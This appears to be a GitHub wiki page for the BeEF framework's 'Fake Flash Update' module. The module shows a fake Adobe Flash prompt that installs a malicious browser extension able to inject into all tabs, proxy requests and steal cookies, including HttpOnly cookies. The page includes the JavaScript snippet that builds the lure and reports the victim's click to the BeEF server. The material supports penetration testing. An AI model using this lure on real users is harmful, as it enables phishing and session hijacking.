Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP

Module: Fake Flash Update

Nbblrr edited this page · 8 revisions
Clone this wiki locally

Summary

  • Description:
    • Prompts the user to install an update to Adobe Flash Player.The file to be delivered could be a Chrome or Firefox extension.
    • A Chrome extension has privileged access and can do a whole lot..
      • Access all tabs and inject beef into all tabs
      • Use hooked browser as a proxy to do cross domain requests
      • Get all cookies including HTTPonly cookies
    • Note : the Chrome extension delivery will work on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded.
      • The Firefox extension is disabling PortBanning (ports 20,21,22,25,110,143), enabling Java, overriding the UserAgent and the default home/new_tab pages. See extensions/ipec/files/LinkTargetFinder dirrectory for the Firefox extension source.
  • Authors: mh, antisnatchor
  • Browsers: All (User is notified)
  • Parameters :
    • Splash Image : Main image used for fake message (default is adobe reader logo)
    • BeEF payload root path : URL of the BeEF server should be here
    • Payload : Choose the payload (Chrome or Firefox)
  • Code

Internal Working

This module basically add a fake message in the center of the screen and redirect to the browser extension when the user clicks on it :

var div = document.createElement('div');
div.setAttribute('id', 'splash');
div.setAttribute('style', 'position:absolute; top:30%; left:40%;');
div.setAttribute('align', 'center');
document.body.appendChild(div);
div.innerHTML= '<a href=\'' + payload + '\' ><img src=\''+ image +'\' /></a>';
    $j("#splash").click(function () {
      $j(this).hide();
        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer=user has accepted');
    });

Screenshots

Command :

Fake message :

Error with Chrome > 20 :

Alert message on Firefox 17 :

Feedback

  • Blocked with recent version of Chrome (> 20)
  • It would be usefull to automatically detect if the browser is chrome or firefox and remove the payload option

References

Something went wrong with that request. Please try again.